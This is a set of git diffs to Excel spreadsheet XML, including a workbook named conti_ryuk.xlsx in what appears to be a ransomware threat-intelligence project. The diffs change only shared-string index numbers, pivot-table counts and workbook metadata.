+      <c r="E268" s="1" t="s">
+        <v>552</v>
+      </c>
+      <c r="F268" s="1"/>
+      <c r="G268" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="269" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A269" s="1" t="s">
+        <v>611</v>
+      </c>
+      <c r="B269" s="1" t="s">
+        <v>313</v>
+      </c>
+      <c r="C269" s="1"/>
+      <c r="D269" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E269" s="1" t="s">
+        <v>553</v>
+      </c>
+      <c r="F269" s="1"/>
+      <c r="G269" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="270" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A270" s="1" t="s">
+        <v>612</v>
+      </c>
+      <c r="B270" s="1"/>
+      <c r="C270" s="1"/>
+      <c r="D270" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E270" s="1" t="s">
+        <v>554</v>
+      </c>
+      <c r="F270" s="1"/>
+      <c r="G270" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="271" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A271" s="1" t="s">
+        <v>613</v>
+      </c>
+      <c r="B271" s="1" t="s">
+        <v>342</v>
+      </c>
+      <c r="C271" s="1"/>
+      <c r="D271" s="1" t="s">
+        <v>358</v>
+      </c>
+      <c r="E271" s="1" t="s">
+        <v>555</v>
+      </c>
+      <c r="F271" s="1"/>
+      <c r="G271" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="272" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A272" s="1" t="s">
+        <v>614</v>
+      </c>
+      <c r="B272" s="1" t="s">
+        <v>342</v>
+      </c>
+      <c r="C272" s="1"/>
+      <c r="D272" s="1" t="s">
+        <v>358</v>
+      </c>
+      <c r="E272" s="1" t="s">
+        <v>556</v>
+      </c>
+      <c r="F272" s="1"/>
+      <c r="G272" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="273" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A273" s="1" t="s">
+        <v>615</v>
+      </c>
+      <c r="B273" s="1"/>
+      <c r="C273" s="1"/>
+      <c r="D273" s="1" t="s">
+        <v>358</v>
+      </c>
+      <c r="E273" s="1" t="s">
+        <v>557</v>
+      </c>
+      <c r="F273" s="1"/>
+      <c r="G273" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="274" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A274" s="1" t="s">
+        <v>616</v>
+      </c>
+      <c r="B274" s="1" t="s">
+        <v>322</v>
+      </c>
+      <c r="C274" s="1"/>
+      <c r="D274" s="1" t="s">
+        <v>358</v>
+      </c>
+      <c r="E274" s="1" t="s">
+        <v>558</v>
+      </c>
+      <c r="F274" s="1"/>
+      <c r="G274" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="275" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A275" s="1" t="s">
+        <v>617</v>
+      </c>
+      <c r="B275" s="1" t="s">
+        <v>313</v>
+      </c>
+      <c r="C275" s="1"/>
+      <c r="D275" s="1" t="s">
+        <v>358</v>
+      </c>
+      <c r="E275" s="1" t="s">
+        <v>559</v>
+      </c>
+      <c r="F275" s="1"/>
+      <c r="G275" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="276" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A276" s="1" t="s">
+        <v>618</v>
+      </c>
+      <c r="B276" s="1"/>
+      <c r="C276" s="1"/>
+      <c r="D276" s="1" t="s">
+        <v>358</v>
+      </c>
+      <c r="E276" s="1" t="s">
+        <v>560</v>
+      </c>
+      <c r="F276" s="1"/>
+      <c r="G276" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="277" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A277" s="1" t="s">
+        <v>619</v>
+      </c>
+      <c r="B277" s="1" t="s">
+        <v>313</v>
+      </c>
+      <c r="C277" s="1"/>
+      <c r="D277" s="1" t="s">
+        <v>358</v>
+      </c>
+      <c r="E277" s="1" t="s">
+        <v>561</v>
+      </c>
+      <c r="F277" s="1"/>
+      <c r="G277" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="278" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A278" s="1" t="s">
+        <v>620</v>
+      </c>
+      <c r="B278" s="1"/>
+      <c r="C278" s="1"/>
+      <c r="D278" s="1" t="s">
+        <v>358</v>
+      </c>
+      <c r="E278" s="1" t="s">
+        <v>562</v>
+      </c>
+      <c r="F278" s="1"/>
+      <c r="G278" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="279" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A279" s="1" t="s">
+        <v>621</v>
+      </c>
+      <c r="B279" s="1" t="s">
+        <v>310</v>
+      </c>
+      <c r="C279" s="1"/>
+      <c r="D279" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E279" s="1" t="s">
+        <v>563</v>
+      </c>
+      <c r="F279" s="1"/>
+      <c r="G279" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="280" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A280" s="1" t="s">
+        <v>622</v>
+      </c>
+      <c r="B280" s="1" t="s">
+        <v>310</v>
+      </c>
+      <c r="C280" s="1"/>
+      <c r="D280" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E280" s="1" t="s">
+        <v>348</v>
+      </c>
+      <c r="F280" s="1"/>
+      <c r="G280" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="281" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A281" s="1" t="s">
+        <v>623</v>
+      </c>
+      <c r="B281" s="1" t="s">
+        <v>310</v>
+      </c>
+      <c r="C281" s="1"/>
+      <c r="D281" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E281" s="1" t="s">
+        <v>564</v>
+      </c>
+      <c r="F281" s="1"/>
+      <c r="G281" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="282" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A282" s="1" t="s">
+        <v>624</v>
+      </c>
+      <c r="B282" s="1" t="s">
+        <v>310</v>
+      </c>
+      <c r="C282" s="1"/>
+      <c r="D282" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E282" s="1" t="s">
+        <v>565</v>
+      </c>
+      <c r="F282" s="1"/>
+      <c r="G282" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="283" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A283" s="1" t="s">
+        <v>625</v>
+      </c>
+      <c r="B283" s="1" t="s">
+        <v>310</v>
+      </c>
+      <c r="C283" s="1"/>
+      <c r="D283" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E283" s="1" t="s">
+        <v>566</v>
+      </c>
+      <c r="F283" s="1"/>
+      <c r="G283" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="284" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A284" s="1" t="s">
+        <v>626</v>
+      </c>
+      <c r="B284" s="1" t="s">
+        <v>310</v>
+      </c>
+      <c r="C284" s="1"/>
+      <c r="D284" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E284" s="1" t="s">
+        <v>567</v>
+      </c>
+      <c r="F284" s="1"/>
+      <c r="G284" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="285" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A285" s="1" t="s">
+        <v>627</v>
+      </c>
+      <c r="B285" s="1" t="s">
+        <v>310</v>
+      </c>
+      <c r="C285" s="1"/>
+      <c r="D285" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E285" s="1" t="s">
+        <v>350</v>
+      </c>
+      <c r="F285" s="1"/>
+      <c r="G285" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="286" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A286" s="1" t="s">
+        <v>628</v>
+      </c>
+      <c r="B286" s="1" t="s">
+        <v>313</v>
+      </c>
+      <c r="C286" s="1"/>
+      <c r="D286" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E286" s="1" t="s">
+        <v>568</v>
+      </c>
+      <c r="F286" s="1"/>
+      <c r="G286" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="287" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A287" s="1" t="s">
+        <v>629</v>
+      </c>
+      <c r="B287" s="1"/>
+      <c r="C287" s="1"/>
+      <c r="D287" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E287" s="1" t="s">
+        <v>569</v>
+      </c>
+      <c r="F287" s="1"/>
+      <c r="G287" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="288" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A288" s="1" t="s">
+        <v>630</v>
+      </c>
+      <c r="B288" s="1" t="s">
+        <v>313</v>
+      </c>
+      <c r="C288" s="1"/>
+      <c r="D288" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E288" s="1" t="s">
+        <v>570</v>
+      </c>
+      <c r="F288" s="1"/>
+      <c r="G288" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="289" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A289" s="1" t="s">
+        <v>631</v>
+      </c>
+      <c r="B289" s="1"/>
+      <c r="C289" s="1"/>
+      <c r="D289" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E289" s="1" t="s">
+        <v>571</v>
+      </c>
+      <c r="F289" s="1"/>
+      <c r="G289" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="290" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A290" s="1" t="s">
+        <v>632</v>
+      </c>
+      <c r="B290" s="1"/>
+      <c r="C290" s="1"/>
+      <c r="D290" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E290" s="1" t="s">
+        <v>572</v>
+      </c>
+      <c r="F290" s="1"/>
+      <c r="G290" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="291" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A291" s="1" t="s">
+        <v>633</v>
+      </c>
+      <c r="B291" s="1"/>
+      <c r="C291" s="1"/>
+      <c r="D291" s="1" t="s">
+        <v>357</v>
+      </c>
+      <c r="E291" s="1" t="s">
+        <v>573</v>
+      </c>
+      <c r="F291" s="1"/>
+      <c r="G291" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="292" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A292" s="1" t="s">
+        <v>634</v>
+      </c>
+      <c r="B292" s="1" t="s">
+        <v>323</v>
+      </c>
+      <c r="C292" s="1"/>
+      <c r="D292" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E292" s="1" t="s">
+        <v>574</v>
+      </c>
+      <c r="F292" s="1"/>
+      <c r="G292" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="293" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A293" s="1" t="s">
+        <v>635</v>
+      </c>
+      <c r="B293" s="1" t="s">
+        <v>323</v>
+      </c>
+      <c r="C293" s="1"/>
+      <c r="D293" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E293" s="1" t="s">
+        <v>575</v>
+      </c>
+      <c r="F293" s="1"/>
+      <c r="G293" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="294" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A294" s="1" t="s">
+        <v>636</v>
+      </c>
+      <c r="B294" s="1" t="s">
+        <v>323</v>
+      </c>
+      <c r="C294" s="1"/>
+      <c r="D294" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E294" s="1" t="s">
+        <v>576</v>
+      </c>
+      <c r="F294" s="1"/>
+      <c r="G294" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="295" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A295" s="1" t="s">
+        <v>637</v>
+      </c>
+      <c r="B295" s="1"/>
+      <c r="C295" s="1"/>
+      <c r="D295" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E295" s="1" t="s">
+        <v>577</v>
+      </c>
+      <c r="F295" s="1"/>
+      <c r="G295" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="296" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A296" s="1" t="s">
+        <v>638</v>
+      </c>
+      <c r="B296" s="1"/>
+      <c r="C296" s="1"/>
+      <c r="D296" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E296" s="1" t="s">
+        <v>578</v>
+      </c>
+      <c r="F296" s="1"/>
+      <c r="G296" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="297" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A297" s="1" t="s">
+        <v>639</v>
+      </c>
+      <c r="B297" s="1"/>
+      <c r="C297" s="1"/>
+      <c r="D297" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E297" s="1" t="s">
+        <v>579</v>
+      </c>
+      <c r="F297" s="1"/>
+      <c r="G297" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="298" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A298" s="1" t="s">
+        <v>640</v>
+      </c>
+      <c r="B298" s="1"/>
+      <c r="C298" s="1"/>
+      <c r="D298" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E298" s="1" t="s">
+        <v>580</v>
+      </c>
+      <c r="F298" s="1"/>
+      <c r="G298" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="299" spans="1:7" ht="17" x14ac:dyDescent="0.2">
+      <c r="A299" s="1" t="s">
+        <v>641</v>
+      </c>
+      <c r="B299" s="1"/>
+      <c r="C299" s="1"/>
+      <c r="D299" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E299" s="1" t="s">
+        <v>581</v>
+      </c>
+      <c r="F299" s="1"/>
+      <c r="G299" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="300" spans="1:7" ht="204" x14ac:dyDescent="0.2">
+      <c r="A300" s="1" t="s">
+        <v>642</v>
+      </c>
+      <c r="B300" s="1" t="s">
+        <v>318</v>
+      </c>
+      <c r="C300" s="1"/>
+      <c r="D300" s="1" t="s">
+        <v>290</v>
+      </c>
+      <c r="E300" s="1" t="s">
+        <v>582</v>
+      </c>
+      <c r="F300" s="1" t="s">
+        <v>583</v>
+      </c>
+      <c r="G300" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="301" spans="1:7" ht="102" x14ac:dyDescent="0.2">
+      <c r="A301" s="1" t="s">
+        <v>643</v>
+      </c>
+      <c r="B301" s="1"/>
+      <c r="C301" s="1"/>
+      <c r="D301" s="1" t="s">
+        <v>363</v>
+      </c>
+      <c r="E301" s="1" t="s">
+        <v>584</v>
+      </c>
+      <c r="F301" s="1"/>
+      <c r="G301" s="1" t="s">
+        <v>532</v>
+      </c>
+    </row>
+    <row r="302" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A302" s="1" t="s">
+        <v>645</v>
+      </c>
+      <c r="B302" s="1" t="s">
+        <v>322</v>
+      </c>
+      <c r="C302" s="1"/>
+      <c r="D302" s="1" t="s">
+        <v>358</v>
+      </c>
+      <c r="E302" s="1" t="s">
+        <v>644</v>
+      </c>
+      <c r="F302" s="1"/>
+      <c r="G302" s="1"/>
     </row>
   </sheetData>
   <phoneticPr fontId="1" type="noConversion"/>

--- a/delta2/lib_e/osi_ransom/conti_ryuk.xlsx
+++ b/delta2/lib_e/osi_ransom/conti_ryuk.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{24076070-37B4-E84E-AF42-DB88560CC5CB}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E89066E5-40CA-9747-A19C-8C830F0EC469}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="120" yWindow="-21100" windowWidth="38280" windowHeight="21100" activeTab="1" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="40" yWindow="-21100" windowWidth="38360" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -18,7 +18,7 @@
   </sheets>
   <calcPr calcId="191029"/>
   <pivotCaches>
-    <pivotCache cacheId="11" r:id="rId3"/>
+    <pivotCache cacheId="21" r:id="rId3"/>
   </pivotCaches>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
@@ -3570,7 +3570,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="5">
+  <cellXfs count="4">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment wrapText="1"/>
@@ -3579,7 +3579,6 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="left"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -8629,7 +8628,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable1.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{301C3F55-9B45-B04F-8A2F-9B3B47A6C66C}" name="PivotTable1" cacheId="11" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{301C3F55-9B45-B04F-8A2F-9B3B47A6C66C}" name="PivotTable1" cacheId="21" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C15" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="6">
     <pivotField dataField="1" showAll="0">
@@ -9314,8 +9313,8 @@
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
 <table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F548" totalsRowShown="0" dataDxfId="6">
   <autoFilter ref="A1:F548" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
-  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F433">
-    <sortCondition ref="A1:A433"/>
+  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F548">
+    <sortCondition ref="A1:A548"/>
   </sortState>
   <tableColumns count="6">
     <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
@@ -9648,9 +9647,9 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
   <dimension ref="A1:F548"/>
   <sheetViews>
-    <sheetView workbookViewId="0">
+    <sheetView tabSelected="1" workbookViewId="0">
       <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="B4" sqref="B4"/>
+      <selection pane="bottomLeft" activeCell="D17" sqref="D17"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -15313,7 +15312,7 @@
         <v>709</v>
       </c>
     </row>
-    <row r="327" spans="1:6" ht="409.5" x14ac:dyDescent="0.2">
+    <row r="327" spans="1:6" ht="409.6" x14ac:dyDescent="0.2">
       <c r="A327" s="1" t="s">
         <v>743</v>
       </c>
@@ -19136,8 +19135,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{7F8BE483-AB9A-D944-9D49-B1DEC612B8FB}">
   <dimension ref="A3:C15"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="A31" sqref="A31"/>
+    <sheetView workbookViewId="0">
+      <selection activeCell="A4" sqref="A4:A14"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -19162,10 +19161,10 @@
       <c r="A4" s="3" t="s">
         <v>802</v>
       </c>
-      <c r="B4" s="4">
+      <c r="B4">
         <v>61</v>
       </c>
-      <c r="C4" s="4">
+      <c r="C4">
         <v>77</v>
       </c>
     </row>
@@ -19173,10 +19172,10 @@
       <c r="A5" s="3" t="s">
         <v>1060</v>
       </c>
-      <c r="B5" s="4">
+      <c r="B5">
         <v>19</v>
       </c>
-      <c r="C5" s="4">
+      <c r="C5">
         <v>25</v>
       </c>
     </row>
@@ -19184,10 +19183,10 @@
       <c r="A6" s="3" t="s">
         <v>1018</v>
       </c>
-      <c r="B6" s="4">
+      <c r="B6">
         <v>17</v>
       </c>
-      <c r="C6" s="4">
+      <c r="C6">
         <v>26</v>
       </c>
     </row>
@@ -19195,10 +19194,10 @@
       <c r="A7" s="3" t="s">
         <v>899</v>
       </c>
-      <c r="B7" s="4">
+      <c r="B7">
         <v>8</v>
       </c>
-      <c r="C7" s="4">
+      <c r="C7">
         <v>34</v>
       </c>
     </row>
@@ -19206,10 +19205,10 @@
       <c r="A8" s="3" t="s">
         <v>804</v>
       </c>
-      <c r="B8" s="4">
+      <c r="B8">
         <v>32</v>
       </c>
-      <c r="C8" s="4">
+      <c r="C8">
         <v>48</v>
       </c>
     </row>
@@ -19217,10 +19216,10 @@
       <c r="A9" s="3" t="s">
         <v>709</v>
       </c>
-      <c r="B9" s="4">
+      <c r="B9">
         <v>47</v>
       </c>
-      <c r="C9" s="4">
+      <c r="C9">
         <v>83</v>
       </c>
     </row>
@@ -19228,10 +19227,10 @@
       <c r="A10" s="3" t="s">
         <v>803</v>
       </c>
-      <c r="B10" s="4">
+      <c r="B10">
         <v>54</v>
       </c>
-      <c r="C10" s="4">
+      <c r="C10">
         <v>69</v>
       </c>
     </row>
@@ -19239,10 +19238,10 @@
       <c r="A11" s="3" t="s">
         <v>463</v>
       </c>
-      <c r="B11" s="4">
+      <c r="B11">
         <v>10</v>
       </c>
-      <c r="C11" s="4">
+      <c r="C11">
         <v>32</v>
       </c>
     </row>
@@ -19250,10 +19249,10 @@
       <c r="A12" s="3" t="s">
         <v>528</v>
       </c>
-      <c r="B12" s="4">
+      <c r="B12">
         <v>35</v>
       </c>
-      <c r="C12" s="4">
+      <c r="C12">
         <v>60</v>
       </c>
     </row>
@@ -19261,10 +19260,10 @@
       <c r="A13" s="3" t="s">
         <v>961</v>
       </c>
-      <c r="B13" s="4">
+      <c r="B13">
         <v>17</v>
       </c>
-      <c r="C13" s="4">
+      <c r="C13">
         <v>30</v>
       </c>
     </row>
@@ -19272,10 +19271,10 @@
       <c r="A14" s="3" t="s">
         <v>331</v>
       </c>
-      <c r="B14" s="4">
+      <c r="B14">
         <v>28</v>
       </c>
-      <c r="C14" s="4">
+      <c r="C14">
         <v>63</v>
       </c>
     </row>
@@ -19283,10 +19282,10 @@
       <c r="A15" s="3" t="s">
         <v>1099</v>
       </c>
-      <c r="B15" s="4">
+      <c r="B15">
         <v>328</v>
       </c>
-      <c r="C15" s="4">
+      <c r="C15">
         <v>547</v>
       </c>
     </row>

--- a/delta2/lib_e/osi_ransom/conti_ryuk.xlsx
+++ b/delta2/lib_e/osi_ransom/conti_ryuk.xlsx
@@ -1,16 +1,16 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="10413"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="10420"/>
   <workbookPr defaultThemeVersion="202300"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E89066E5-40CA-9747-A19C-8C830F0EC469}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{276EFC05-44A0-3340-B205-A6A2BBFC43CE}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="40" yWindow="-21100" windowWidth="38360" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="200" yWindow="1360" windowWidth="34560" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -18,7 +18,7 @@
   </sheets>
   <calcPr calcId="191029"/>
   <pivotCaches>
-    <pivotCache cacheId="21" r:id="rId3"/>
+    <pivotCache cacheId="19" r:id="rId3"/>
   </pivotCaches>
